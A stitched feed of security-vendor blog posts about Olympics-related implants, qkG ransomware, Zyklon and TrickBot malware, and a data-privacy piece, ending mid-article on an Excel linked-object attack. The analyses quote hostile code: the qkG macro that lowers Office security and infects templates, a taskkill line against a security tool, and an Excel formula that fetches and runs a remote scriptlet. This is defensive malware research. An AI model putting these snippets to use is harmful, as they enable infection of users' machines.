Checking for antimalware or cleaner processes.

  • If found, these processes are terminated by sending a WM_CLOSE message to their windowing threads.

Terminating an antimalware/cleaner process.

 

Brave Prince

Brave Prince is a Korean-language implant that contains similar code and behavior to the Gold Dragon variants, specifically the system profiling and control server communication mechanism. The malware gathers detailed logs about the victim’s configuration, contents of the hard drive, registry, scheduled tasks, running processes, and more. Brave Prince was first observed in the wild December 13, 2017, sending logs to the attacker via South Korea’s Daum email service. Later variants posted the data to a web server via an HTTP post command, in the same way that Gold Dragon does.

The embedded domain braveprince.com.

The Daum variants of Brave Prince gather information from the system and save it to the file PI_00.dat. This file is sent as an attachment to the attacker’s email address. Later variants upload the file to a web server via an HTTP post command. The type of data this implant gathers from the victim’s system:

  • Directories and files
  • Network configuration
  • Address resolution protocol cache
  • Systemconfig to gather tasks

Both variants of Brave Prince can kill a process associated with a tool created by Daum that can block malicious code. This tool is exclusive to South Korea.

  • taskkill /f /im daumcleaner.exe

The later variants of Brave Prince include the following hardcoded strings:

  • c:\utils\c2ae_uiproxy.exe
  • c:\users\sales\appdata\local\temp\dwrrypm.dl

 

Ghost419

Ghost419 is a Korean-language implant that first appeared in the wild December 18, 2017, with the most recent sample appearing two days before the Olympics spear phishing email. The malware can be identified by the hardcoded string and URL parameter passed to the control server. Ghost419 can be traced to a sample created July 29, 2017, that appears to be a much earlier version (without the hardcoded identifier). The July version shares 46% of its code with samples created in late December. This early version implant creates a unique mutex value (kjie23948_34238958_KJ238742) that also appears in a sample from December, with the exception that one digit has changed. Ghost419 is based on Gold Dragon and Brave Prince implants and contains shared elements and code, especially for system reconnaissance functions.

Hardcoded “Ghost419” in the malware binary.

The string “WebKitFormBoundarywhpFxMBe19cSjFnG,” part of the upload mechanism, also appears in the Gold Dragon variants of late December 2017.

Gold Dragon sample.

Ghost419 sample.

Numerous other similarities are present in addition to system reconnaissance methods; the communication mechanism uses the same user agent string as Gold Dragon.

Gold Dragon user agent string.

Ghost419 user agent string.

 

RunningRat

RunningRat is a remote access Trojan (RAT) that operates with two DLLs. It gets its name from a hardcoded string embedded in the malware. Upon being dropped onto a system, the first DLL executes. This DLL serves three main functions: killing antimalware, unpacking and executing the main RAT DLL, and obtaining persistence. The malware drops the Windows batch file dx.bat, which attempts to kill the task daumcleaner.exe; a Korean security program. The batch file then attempts to remove itself.

The first DLL unpacks a resource file attached to the DLL using a zlib decompression algorithm. The authors of the malware left the debugging strings in the binary, making the algorithm easy to identify. The second DLL is decompressed in memory and never touches the user’s file system; this file is the main RAT that executes. Finally, the first DLL adds the registry key “SysRat,” at SoftWare\Microsoft\Windows\CurrentVersion\Run, to ensure the malware is executed at startup.

After the second DLL is loaded into memory, the first DLL overwrites the IP address for the control server, effectively changing the address the malware will communicate with. This address is hardcoded in the second DLL as 200.200.200.13 and is modified by the first DLL to 223.194.70.136.

This type of behavior may indicate this code is being reused or is part of a malware kit.

The first DLL uses one common antidebugging technique by checking for SeDebugPrivilege.

Once the second DLL is executed, it gathers information about the victim system’s setup, such as operating system version, and driver and processor information.

The malware initiates its main function of capturing user keystrokes and sending them to the control server using standard Windows networking APIs.

From our analysis, stealing keystrokes is the main function of RunningRat; however, the DLL has code for more extensive functionality. Code is included to copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and much more. However, our current analysis shows no way for such code to be executed.

McAfee ATR analysts will continue to research RunningRat to determine if this extra code is used or is possibly left over from a larger RAT toolkit.

The second DLL employs a few additional antidebugging techniques. One is the use of a custom exception handler and code paths that are designed to generate exceptions.

There are also a few random empty-nested threads to slow down researchers during static analysis.

The final antidebugging technique involves GetTickCount performance counters, which are placed within the main sections of code to detect any delay a debugger adds during runtime.

  

Conclusion

The PowerShell script first discovered by McAfee ATR was delivered via a spear phishing campaign that used image stenography techniques to hide the first-stage implant. (For more on steganography, see the McAfee Labs Threats Report, June 2017, page 33.)

The implants covered in this research establish a permanent presence on the victim’s system once the PowerShell implant is executed. The implants are delivered as a second stage once the attacker gains an initial foothold using fileless malware. Some of the implants will maintain their persistence only if Hangul Word, which is specific to South Korea, is running.

With the discovery of these implants, we now have a better understanding of the scope of this operation. Gold Dragon, Brave Prince, Ghost419, and RunningRat demonstrate a much wider campaign than previously known. The persistent data exfiltration we see from these implants could give the attacker a potential advantage during the Olympics.

We thank Charles Crawford and Asheer Malhotra for their support of this analysis.

 

Indicators of Compromise

IPs

  • 223.194.70.136

Domains

  • trydai.000webhostapp.com
  • follow_dai.000webhostapp.com
  • eodo1.000webhostapp.com
  • nid-help-pchange.atwebpages.com
  • ink.inkboom.co.kr
  • followgho.byethost7.com

Hashes

  • fef671c13039df24e1606d5fdc65c92fbc1578d9
  • 06948ab527ae415f32ed4b0f0d70be4a86b364a5
  • 96a2fda8f26018724c86b275fe9396e24b26ec9e
  • ad08a60dc511d9b69e584c1310dbd6039acffa0d
  • c2f01355880cd9dfeef75cff189f4a8af421e0d3
  • 615447f458463dc77f7ae3b0a4ad20ca2303027a
  • bf21667e4b48b8857020ba455531c9c4f2560740
  • bc6cb78e20cb20285149d55563f6fdcf4aaafa58
  • 465d48ae849bbd6505263f3323e818ccb501ba88
  • a9eb9a1734bb84bbc60df38d4a1e02a870962857
  • 539acd9145befd7e670fe826c248766f46f0d041
  • d63c7d7305a8b2184fff3b0941e596f09287aa66
  • 35e5310b6183469f4995b7cd4f795da8459087a4
  • 11a38a9d23193d9582d02ab0eae767c3933066ec
  • e68f43ecb03330ff0420047b61933583b4144585
  • 83706ddaa5ea5ee2cfff54b7c809458a39163a7a
  • 3a0c617d17e7f819775e48f7edefe9af84a1446b
  • 761b0690cd86fb472738b6dc32661ace5cf18893
  • 7e74f034d8aa4570bd1b7dcfcdfaa52c9a139361
  • 5e1326dd7122e2e2aed04ca4de180d16686853a7
  • 6e13875449beb00884e07a38d0dd2a73afe38283
  • 4f58e6a7a04be2b2ecbcdcbae6f281778fdbd9f9
  • 389db34c3a37fd288e92463302629aa48be06e35
  • 71f337dc65459027f4ab26198270368f68d7ae77
  • 5a7fdfa88addb88680c2f0d5f7095220b4bbffc1

Indicators of Compromise for Feb. 12 update:

Hashes

  •  Sha1: 7ae731d666e547b4f3442fe5675c8e8719d8d862

URLs

  • hxxps://minibodegaslock.cl:443/components/com_tags/controllers/default_tags.php
  • hxxps://minibodegaslock.cl/components/com_tags/controllers/access_log

The post Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems appeared first on McAfee Blogs.

ATM ‘jackpotting’ hacks reach the US

For some ATM thieves, swiping card data involves too much patience -- they'd rather just take the money and run. The US Secret Service has warned ATM makers Diebold Nixdorf and NCR that "jackpotting" hacks, where crooks force machine to cough up large sums of cash, have reached the US after years of creating problems in Asia, Europe and Mexico. The attacks have focused largely on Diebold's front-loading Opteva ATMs in stand-alone locations, such as retail stores and drive-thrus, and have relied on a combination of malware and hardware to pull off heists.

Via: Reuters

Source: Krebs on Security

How to Treat Your Family’s Personal Data Like Gold in a Hyper-Connected World

Tomorrow, January 28, is National Data Privacy Day. While that may not mean a lot to you at first glance, the day shines a light on one of the most critical issues facing families today — protecting personal information in a hyper-connected world.

The day gives us an opportunity to 1) honestly examine the many ways our lives are connected and, 2) to take responsibility (and steps) to safeguard each area of personal privacy we expose — or potentially misuse — every time we power up.

Data Channels

Every day we connect our lives to external sources that are useful, productive, and entertaining without even realizing the many ways others can exploit our digital connections. There are the obvious sources that present a risk to our data such as social networks, online shopping, web browsing, and apps. Then there are the not-so-obvious sources that gather our information such as medical offices, schools, financial institutions, retail businesses, household assistants, TVs, home security systems, appliances, toys, and wearables.

Studies show that most of us certainly are not going to give up our connected lives to prevent a data breach. So, the next practical step is to get more intentional about our family’s privacy and take specific actions to minimize our risk.

The Risks Are Real

If you’ve never suffered the consequences of another person or organization exploiting your personal information, then you may not understand the seriousness of protecting it. However, as we all become more seamlessly connected in an Internet of Things (IoT) world, chances are you will experience some data misuse or abuse in the future. Those acts might be large-scale breaches such as the ones we’ve seen with Equifax, Uber, and Verizon or the breach may be on a smaller scale but just as financially and emotionally damaging.

When personal data gets hacked, sold, or exploited several things can happen. Digital fallout includes identity theft, credit card fraud, medical fraud, home break-ins, data misuse by companies, reputation damage, location and purchasing tracking, ransomware, and much more.

So the technology-driven future we’ve imagined is here — and it’s pretty awesome — but so too are the risks. And who among us could have guessed that parenting in the 21st century would include teaching kids about cybercriminals, data mining, and privacy breaches?

Step-Up Family Privacy

Treat privacy like gold. If more of us saw our personal information the way cybercriminals see it — like gold — then we may be more inclined to lock it up. Guiding your family in this mind-shift requires real effort. Teach your kids to view their personal information — address, habits, personal routine, school name, relationships, passwords, connected devices — as gold. Gold is to be treasured, locked up, and shared with great discernment. This attitude change may take time but, hopefully, the return on investment will mean your kids pause before handing over personal info to an app, a social network, a retail store, or even to friends.

Stress responsibility and respect. Stopping to think before you share online or connect a digital device is a key to safeguarding digital privacy. By teaching your kids that living in a connected world comes with responsibility for one’s actions and respect for others, you a leap in securing our family’s online privacy.

Routinely secure the basics. There are fundamental security measures under our roofs that cybercriminals are counting on all of us to neglect (and many of us do just that). Powerful security steps include: 1) Update all software (PC, phone, tablets, etc.) routinely 2) Establish and maintain strong passwords 3) Secure privacy settings on all social networks 4) Lock down your home network 5) Don’t overshare family details (names, travel, location, address, friends) online.

Make privacy fun. Here’s something to ponder. Challenge your kids to keep a low profile online. Talk about the power of being discreet, private, and mysterious in their digital peer group. Encourage them to set themselves apart by being the one who isn’t so easily accessed. Ask: Is digital sharing an enjoyable thing or, in reality, has it become an exhausting habit? Challenge them to go undercover (dark) online for a week and journal the pros and cons of being hyper private online. Come up with an incentive that works for your family.

Enjoy the Wows

Overall, stop and consider what your digital devices, apps, games, and products are asking of you. Is that fitness tracker getting a little too personal? Does that new toy, home security system, or household assistant know more than your family than your own mother does?Then don’t fill in every blank box. Go into the privacy settings and shore up product access, freshen up your passwords, and make sure you stay on top of software updates. Stop giving retailers, government agencies, and online marketers your email address. In short — pay attention, protect, and cherish your personal data. You can enjoy the wows of your technology without opening up your family’s privacy.

toni page birdsong

 

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures). 

The post How to Treat Your Family’s Personal Data Like Gold in a Hyper-Connected World appeared first on McAfee Blogs.

qkG: Simple Malware, Tricky Ransomware

By Oleg Boyarchuk and Stefano Ortolani

Introduction

When ransomware behavior is clearly exhibited, it is relatively easy for a sandbox or a personal A/V to assert detection; after all, in its simplest form, ransomware malware must at least: (1) search for files to be encrypted, and (2) overwrite those files with their encrypted representation. Lastline Labs’ Alexander Sevtsov covered a deep dive on ransomware behavior not so long ago in Ransomware: Too Overt to Hide. Nevertheless, when it comes to detecting ransomware targeting specific files, things might get a tad more complicated. This is the case of qkG, a malware (sha1=a9174fec5d81977eee9de2658a92fa9e4de76dd4) designed to infect documents and encrypt their content (our friends at TrendMicro did an excellent job outlining the encryption process and uncovering the encryption key in this report).

How it Works

Documents infected by qkG come with an embedded VBA script that gets executed when the document is opened (note that macros must be manually enabled for the malicious code to execute). The VBA includes the following ransom note (which, incidentally, is unique and thus a good candidate for a YARA signature):

Signature = "I'm QkG@PTM17! by TNA@MHT-TT2"
sInfo = "Send $300 to BTC Address: 14zA1NdTgtesLWZxtysLQQtsuKzjFbpydg" & vbCrLf & "Contact Email: mht-tt2@protonmail.com"

qkG infects the Normal.dot template file, resulting in any other document opened by the user to become infected. Obviously, in order to avoid suspicion, qkG immediately tries to lower the Microsoft Office security settings in order to both access the VBA object model and enable macros permanently:

System.PrivateProfileString("", "HKEY_CUR" + "RENT_USER\Sof" + "tware\Micros" + "oft\Off" + "ice\" & Ver & "\Wo" + "rd\Secu" + "rity", "Acces" + "sVBOM") = 1
System.PrivateProfileString("", "HKEY_CUR" + "RENT_USER\Sof" + "tware\Micros" + "oft\Off" + "ice\" & Ver & "\Wo" + "rd\Secu" + "rity", "VBAW" + "arnings") = 1

This is done via the System.PrivateProfileString property, which has the interesting feature of writing REG_SZ values rather than REG_DWORD. Unfortunately, a fact that the malware authors must have overlooked, Microsoft Word is not able to read REG_SZ values. This means that opening an infected document will always require the following two conditions to be met, regardless of what the code actually tried to achieve:

  1. The VBA object model must have been manually enabled by the user:
  2. Macros must be enabled every single time a document is opened.

Note that even if the malware fails to automatically enable macros, the Lastline sandbox still detects this attempt and reports it as “Lowering macro security” with a high score. If condition (1) is met, qkG infects Normal.dot with its own code:

Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
...
If NTLines > 0 Then NT.CodeModule.DeleteLines 1, NTLines
NT.Name = "qkG"
NT.CodeModule.AddFromString ("Private Sub Document_Close()")
NT.CodeModule.InsertLines 2, AD.CodeModule.Lines(2, ADLines - 1)

The code inside Normal.dot is then used to infect any other document the user might open afterwards:

Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
...
If ADLines > 0 Then AD.CodeModule.DeleteLines 1, ADLines
AD.Name = "qkG"
AD.CodeModule.AddFromString ("Private Sub Document_Open()")
AD.CodeModule.InsertLines 2, NT.CodeModule.Lines(2, NTLines - 1)

Generally speaking, modifying macro code via CodeModule.DeleteLines and CodeModule.InsertLines is a suspicious activity per-se, and it is in fact flagged as such by the Lastline static document analyzer. As we can see from the code itself, the actual infection happens when the document is closed (Document_Close()), showing how important is for a sandbox to faithfully replicate the activity of a real user.

A Peculiar Behavior

Every time a document is either opened or closed, the malware encrypts the whole text and prepends the following ransom note:

This is quite unique, and it deviates from the ransomware behavior we usually see in malware such as WannaCry or BadRabbit where all files matching a set of extensions get encrypted. In this case, encryption, and thus the actual ransomware behavior, is tied to what the user is doing, and in particular to what documents he/she opens. Any technique tailored to detect ransomware in the general case would just fail here.

Conclusion

The malware does not enumerate or modify other files; it only encrypts a file when the user opens it by replacing its content. Because of all these reasons, automatically detecting this behavior as ransomware can be challenging if only generic behavioral techniques are used. A much more effective approach is instead a combination of static and dynamic analysis aimed at detecting as many behaviors as possible, hunting for those even a bit suspicious like modifying the macro code or altering the template file.

The post qkG: Simple Malware, Tricky Ransomware appeared first on Lastline.

Microsoft Office Vulnerabilities Used to Distribute Zyklon Malware in Recent Campaign

Introduction

FireEye researchers recently observed threat actors leveraging relatively new vulnerabilities in Microsoft Office to spread Zyklon HTTP malware. Zyklon has been observed in the wild since early 2016 and provides myriad sophisticated capabilities.

Zyklon is a publicly available, full-featured backdoor capable of keylogging, password harvesting, downloading and executing additional plugins, conducting distributed denial-of-service (DDoS) attacks, and self-updating and self-removal. The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so. The malware can download several plugins, some of which include features such as cryptocurrency mining and password recovery, from browsers and email software. Zyklon also provides a very efficient mechanism to monitor the spread and impact.

Infection Vector

We have observed this recent wave of Zyklon malware being delivered primarily through spam emails. The email typically arrives with an attached ZIP file containing a malicious DOC file (Figure 1 shows a sample lure).

The following industries have been the primary targets in this campaign:

  • Telecommunications
  • Insurance
  • Financial Services


Figure 1: Sample lure documents

Attack Flow

  1. Spam email arrives in the victim’s mailbox as a ZIP attachment, which contains a malicious DOC file.
  2. The document files exploit at least three known vulnerabilities in Microsoft Office, which we discuss in the Infection Techniques section. Upon execution in a vulnerable environment, the PowerShell based payload takes over.
  3. The PowerShell script is responsible for downloading the final payload from C2 server to execute it.

A visual representation of the attack flow and execution chain can be seen in Figure 2.


Figure 2: Zyklon attack flow

Infection Techniques

CVE-2017-8759

This vulnerability was discovered by FireEye in September 2017, and it is a vulnerability we have observed being exploited in the wild.

The DOC file contains an embedded OLE Object that, upon execution, triggers the download of an additional DOC file from the stored URL (seen in Figure 3).


Figure 3: Embedded URL in OLE object

CVE-2017-11882

Similarly, we have also observed actors leveraging another recently discovered vulnerability (CVE-2017-11882) in Microsoft Office. Upon opening the malicious DOC attachment, an additional download is triggered from a stored URL within an embedded OLE Object (seen in Figure 4).


Figure 4: Embedded URL in OLE object


Figure 5: HTTP GET request to download the next level payload

The downloaded file, doc.doc, is XML-based and contains a PowerShell command (shown in Figure 6) that subsequently downloads the binary Pause.ps1.


Figure 6: PowerShell command to download the Pause.ps1 payload

Dynamic Data Exchange (DDE)

Dynamic Data Exchange (DDE) is the interprocess communication mechanism that is exploited to perform remote code execution. With the help of a PowerShell script (shown in Figure 7), the next payload (Pause.ps1) is downloaded.


Figure 7: DDE technique used to download the Pause.ps1 payload

One of the unique approaches we have observed is the use of dot-less IP addresses (example: hxxp://258476380).

Figure 8 shows the network communication of the Pause.ps1 download.


Figure 8: Network communication to download the Pause.ps1 payload

Zyklon Delivery

In all these techniques, the same domain is used to download the next level payload (Pause.ps1), which is another PowerShell script that is Base64 encoded (as seen in Figure 8).

The Pause.ps1 script is responsible for resolving the APIs required for code injection. It also contains the injectable shellcode. The APIs contain VirtualAlloc(), memset(), and CreateThread(). Figure 9 shows the decoded Base64 code.


Figure 9: Base64 decoded Pause.ps1

The injected code is responsible for downloading the final payload from the server (see Figure 10). The final stage payload is a PE executable compiled with .Net framework.


Figure 10: Network traffic to download final payload (words.exe)

Once executed, the file performs the following activities:

  1. Drops a copy of itself in %AppData%\svchost.exe\svchost.exe and drops an XML file, which contains configuration information for Task Scheduler (as shown in Figure 11).
  2. Unpacks the code in memory via process hollowing. The MSIL file contains the packed core payload in its .Net resource section.
  3. The unpacked code is Zyklon.


Figure 11: XML configuration file to schedule the task

The Zyklon malware first retrieves the external IP address of the infected machine using the following:

  • api.ipify[.]org
  • ip.anysrc[.]net
  • myexternalip[.]com
  • whatsmyip[.]com

The Zyklon executable contains another encrypted file in its .Net resource section named tor. This file is decrypted and injected into an instance of InstallUtiil.exe, and functions as a Tor anonymizer.

Command & Control Communication

The C2 communication of Zyklon is proxied through the Tor network. The malware sends a POST request to the C2 server. The C2 server is appended by the gate.php, which is stored in file memory. The parameter passed to this request is getkey=y. In response to this request, the C2 server responds with a Base64-encoded RSA public key (seen in Figure 12).


Figure 12: Zyklon public RSA key

After the connection is established with the C2 server, the malware can communicate with its control server using the commands shown in Table 1.

Command

Action

sign

Requests system information

settings

Requests settings from C2 server

logs

Uploads harvested passwords

wallet

Uploads harvested cryptocurrency wallet data

proxy

Indicates SOCKS proxy port opened

miner

Cryptocurrency miner commands

error

Reports errors to C2 server

ddos

DDoS attack commands

Table 1: Zyklon accepted commands

The following figures show the initial request and subsequent server response for the “settings” (Figure 13), “sign” (Figure 14), and “ddos” (Figure 15) commands.


Figure 13: Zyklon issuing “settings” command and subsequent server response


Figure 14: Zyklon issuing “sign” command and subsequent server response


Figure 15: Zyklon issuing “ddos” command and subsequent server response

Plugin Manager

Zyklon downloads number of plugins from its C2 server. The plugin URL is stored in file in following format:

  • /plugin/index.php?plugin=<Plugin_Name>

The following plugins are found in the memory of the Zyklon malware:

  • /plugin/index.php?plugin=cuda
  • /plugin/index.php?plugin=minerd
  • /plugin/index.php?plugin=sgminer
  • /plugin/index.php?plugin=socks
  • /plugin/index.php?plugin=tor
  • /plugin/index.php?plugin=games
  • /plugin/index.php?plugin=software
  • /plugin/index.php?plugin=ftp
  • /plugin/index.php?plugin=email
  • /plugin/index.php?plugin=browser

The downloaded plugins are injected into: Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe.

Additional Features

The Zyklon malware offers the following additional capabilities (via plugins):

Browser Password Recovery

Zyklon HTTP can recover passwords from popular web browsers, including:

  • Google Chrome
  • Mozilla Firefox
  • Internet Explorer
  • Opera Browser
  • Chrome Canary/SXS
  • CoolNovo Browser
  • Apple Safari
  • Flock Browser
  • SeaMonkey Browser
  • SRWare Iron Browser
  • Comodo Dragon Browser
FTP Password Recovery

Zyklon currently supports FTP password recovery from the following FTP applications:

  • FileZilla
  • SmartFTP
  • FlashFXP
  • FTPCommander
  • Dreamweaver
  • WS_FTP
Gaming Software Key Recovery

Zyklon can recover PC Gaming software keys from the following games:

  • Battlefield
  • Call of Duty
  • FIFA
  • NFS
  • Age of Empires
  • Quake
  • The Sims
  • Half-Life
  • IGI
  • Star Wars
Email Password Recovery

Zyklon may also collect email passwords from following applications:

  • Microsoft Outlook Express
  • Microsoft Outlook 2002/XP/2003/2007/2010/2013
  • Mozilla Thunderbird
  • Windows Live Mail 2012
  • IncrediMail, Foxmail v6.x - v7.x
  • Windows Live Messenger
  • MSN Messenger
  • Google Talk
  • GMail Notifier
  • PaltalkScene IM
  • Pidgin (Formerly Gaim) Messenger
  • Miranda Messenger
  • Windows Credential Manager
License Key Recovery

The malware automatically detects and decrypts the license/serial keys of more than 200 popular pieces of software, including Office, SQL Server, Adobe, and Nero.

Socks5 Proxy

Zyklon features the ability to establish a reverse Socks5 proxy server on infected host machines.

Hijack Clipboard Bitcoin Address

Zyklon has the ability to hijack the clipboard, and replaces the user’s copied bitcoin address with an address served up by the actor’s control server.

Zyklon Pricing

Researchers identified different versions of Zyklon HTTP being advertised in a popular underground marketplace for the following prices:

  • Normal build: $75 (USD)
  • Tor-enabled build: $125 (USD)
  • Rebuild/Updates: $15 (USD)
  • Payment Method: Bitcoin (BTC)

Conclusion

Threat actors incorporating recently discovered vulnerabilities in popular software – Microsoft Office, in this case – only increases the potential for successful infections. These types of threats show why it is very important to ensure that all software is fully updated. Additionally, all industries should be on alert, as it is highly likely that the threat actors will eventually move outside the scope of their current targeting.

At this time of writing, FireEye Multi Vector Execution (MVX) engine is able to recognize and block this threat. Table 2 lists the current detection and blocking capabilities by product.

Detection Name

Product

Action

POWERSHELL DOWNLOADER D (METHODOLOGY)

HX

Detect

SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)

HX

Detect

POWERSHELL DOWNLOADER (METHODOLOGY)

HX

Detect

SUSPICIOUS EQNEDT USAGE (METHODOLOGY)

HX

Detect

TOR (TUNNELER)

HX

Detect

SUSPICIOUS SVCHOST.EXE (METHODOLOGY)

HX

Detect

Malware.Binary.rtf

EX/ETP/NX

Block

Malware.Binary

EX/ETP/NX

Block

FE_Exploit_RTF_CVE_2017_8759

EX/ETP/NX

Block

FE_Exploit_RTF_CVE201711882_1

EX/ETP/NX

Block

Table 2: Current detection capabilities by FireEye products

Indicators of Compromise

The contained analysis is based on the representative sample lures shown in Table 3.

MD5

Name

76011037410d031aa41e5d381909f9ce

accounts.doc

4bae7fb819761a7ac8326baf8d8eb6ab

Courrier.doc

eb5fa454ab42c8aec443ba8b8c97339b

doc.doc

886a4da306e019aa0ad3a03524b02a1c

Pause.ps1

04077ecbdc412d6d87fc21e4b3a4d088

words.exe

Table 3: Sample Zyklon lures

Network Indicators
  • 154.16.93.182
  • 85.214.136.179
  • 178.254.21.218
  • 159.203.42.107
  • 217.12.223.216
  • 138.201.143.186
  • 216.244.85.211
  • 51.15.78.0
  • 213.251.226.175
  • 93.95.100.202
  • warnono.punkdns.top

Forever 21 breach exposed customer credit card info for months

If you shopped at a Forever 21 store this year, there's a chance your credit card information may have been stolen, CNET reports. The retail store confirmed this week that between April 3rd and November 18th of this year, a number of point of sale terminals at stores across the US were breached. While it hasn't provided any numbers on how many customers were affected, Forever 21 did say that in most cases, card numbers, expiration dates and verification codes, but not cardholder names, were obtained by hackers. However, in some cases names were also obtained.

Via: CNET

Source: Forever 21

Don’t Let An Auto-Elevating Bot Spoil Your Christmas

Ho ho ho! Christmas is coming, and for many people it’s time to do some online shopping.
Authors of banking Trojans are well aware of this yearly phenomenon, so it shouldn’t come as a surprise that some of them have been hard at work preparing some nasty surprises for this shopping season.

And that’s exactly what TrickBot has just gone and done. As one of the most prevalent banking malware for Windows nowadays, we’ve recently seen it diversify into attacking Nordic banks. We’ve blogged about that a couple of times already.

As usual, the Trojan is being delivered via spam campaigns. According to this graph, based on our telemetry, most spam was distributed between Tuesday afternoon and Wednesday morning:

trickbot_spam_graph_20171213

The spam emails we’ve seen typically have a generic subject like “Your Payment – 1234”, a body with nothing but “Your Payment is attached”, and indeed an attachment which is a Microsoft Word document with instructions in somewhat poor English…

trickbot_spam_word_doc

Clicking the button will not reveal any document content, but launch a macro that will eventually download and run the TrickBot payload.
Same old trick, but some people who have just bought a Christmas gift might still fall for it and end up with another ‘gift’ installed on their computer.

And that ‘gift’ is the most interesting part of this story. The newest payload underwent some changes which are, well, remarkable…

Targets

Since its initial appearance during Fall 2016, the actors have been actively developing the malware, and are constantly expanding and changing the targets. Here a short summary of the recently spotted changes:

  • Removed: banks in Australia, New Zealand, Argentina, Italy
  • Changed: a few Spanish, Austrian and Finnish targets are now found in the Dynamic Injection list (adding interception code to the actual web page) instead of using Static Injection (replacing the complete web page)
  • Added: new banks, particularly in France, Belgium and Greece.

Anti-sandbox checks

Up till now, we were not aware of any features in TrickBot that were checking if the malware is run in a virtual machine or a sandboxed environment used for automatic analysis. The new version has introduced a few simple checks against some known sandboxes by calling GetModuleHandle for the following DLLs:

trickbot_antisandbox

(More info about every DLL can be found here)

If any of these modules are found, the payload just quits.

Interestingly, we have also found a few encrypted strings that seem to indicate detection of the Windows virtual machine images that Microsoft provides for web developers to test their code in Internet Explorer and Edge, however, these strings are not used anywhere (yet). Let’s see if the actors will expand their sandbox evasion attempts in a future version.

trickbot_test_vm

Auto-elevation

But we have saved the best for last. When the payload was running, we noticed that it didn’t run with user rights, as it always did before. Instead, it was running under the SYSTEM account, i.e. with full system privileges. There was no UAC prompt during the infection sequence, so TrickBot must have used an auto-elevation mechanism to gain admin rights.

A little search in the disassembly quickly revealed an obvious clue:

trickbot_elevation_1

Combined with a few hard-coded CLSIDs …

trickbot_elevation_2

… we found out that the actors have implemented a UAC bypass which was (as far as we are aware of) publicly disclosed only a few months ago. The original discovery is explained here:
https://msitpros.com/?p=3960
And later implemented as a standalone piece of code, and most likely the main inspiration for the TrickBot coders:
https://gist.github.com/hfiref0x/196af729106b780db1c73428b5a5d68d

In short: this bypass is a re-implementation of a COM interface to launch ShellExec with admin rights, and it is used in a standard Windows component “Component Manager Administrator Kit” to install network connections on machine level.

It works everywhere from Windows 7 up to the latest Windows 10 version 1709 with default UAC settings, and considering it’s basically a Windows feature, probably hard to address. In other words, perfect for usage in malware, and it wouldn’t surprise us if we’ll see the same bypass in more families soon.

Thanks to Päivi for the spam graph.

 

When Scriptlets Attack: Excel’s Alternative to DDE Code Execution

We’ve recently discovered a malicious Office Excel file that appeared to have the ability to download and execute malware. Examining the file, we saw no evidence of macros, shellcode, or DDE functionality. When scanning the file on Virustotal, the low detection gives the appearance that we are witnessing an unknown technique.

malicious Office Excel file

User Infection

Upon opening this Office Excel file, the user is immediately prompted to update the workbook’s external links. External links are a Microsoft Office feature that allows an author to share an Office document with references to external resources, rather than embedding them directly, which keeps the document size small and more flexible to updates. From this perspective, the attack appears very similar to the DDE attack—an increasingly popular Office File exploit that abuses Microsoft’s Dynamic Data Exchange, to execute foreign code.

Open Excel File

Upon updating links, the document instantly spawns cmd/PowerShell processes, which download and execute the next stage (exe):

Exe DeliveredExe Delivered:

Lastline Portal Analysis

However, examining the Office Excel file, no evidence of a DDE attack can be found. What can be found, however, is simply one cell containing the formula =Package|’scRiPt:http://magchris[.]ga/images/squrey.xml’!””

scriplets attackExamining this URL, we find it pointing to a Microsoft scriptlet—a Microsoft XML wrapper for scripting languages to register themselves as COM objects and execute. This particular scriptlet wraps a VBScript, which is designed to download and execute the second stage of malware.

scriplets attack wrapping a VBScript

What is the “Package” Keyword?

While the formula format used may appear odd, it’s actually standard format for a linked file object in Excel. Here is demonstrated how one would create a link to a File Object in Excel:

Linked file object in Excel

After submitting, the cell formula becomes: =Package|’C:\users\myfile.txtl’!””, which now would cause the Excel spreadsheet to host a link to my local file inside the Excel document. Of course, dangers occur when this concept is modified for malicious purposes.

How Attackers Can Abuse Linked File Objects

To understand why this exploit works, we need to look at how Office evaluates this formula. When a user chooses to “update links”, Excel will parse the path portion of this formula and pass it to the MkParseDisplayName API function. MkParseDisplayName is responsible for parsing a human-readable URI (such as “scRiPt:http://magchris[.]ga/images/squrey.xml”) into a moniker best associated with the URI pattern. A moniker is simply an object interface that can be bound/applied to a resource – for example, a local file URI will be detected as a local file resource – thus returning a FileMoniker for object interaction. The table below shows examples of how different resource URIs are handled as monikers:

linked file objectsAs you can see, since the attackers are specifying the “script:” prefix in their resource URI, the MkParseDisplayName identifies the resource as a scriptlet, thus returning a moniker to a Windows Script Component (ComScriptletMoniker – {06290BD3-48AA-11D2-8432-006008C3FBFC}).

MkParseDisplayName

Now that a Windows Script Component moniker is associated with the linked object in Excel, the attack is just one API away from script execution. Following this moniker resolution, the result is then checked to see if it appears to be a FileMoniker or not, as seen in disassembly below.

FileMoniker

In this malicious workbook, the moniker is not detected as a FileMoniker, but rather as MKSYS_NONE, since it is a ComScriptletMoniker. This causes execution to be diverted to an MSO.dll call (highlighted in red), which wraps a call to OleCreateLink:

MKSYS_NONE

When the linked data associated with a Scriptlet Moniker is passed to OleCreateLink API, the remote resource is downloaded and executed, resulting in system compromise. The image below shows Excel being debugged while we “update workbook links”, which results in a call to OleCreateLink (with scriptlet moniker) and executes the remote script, resulting in cmd and PowerShell instances to execute (seen in the lower right window – Processhacker.exe).

excelExecute

Payload

While this exploit is very effective, the particular sample attempting to leverage i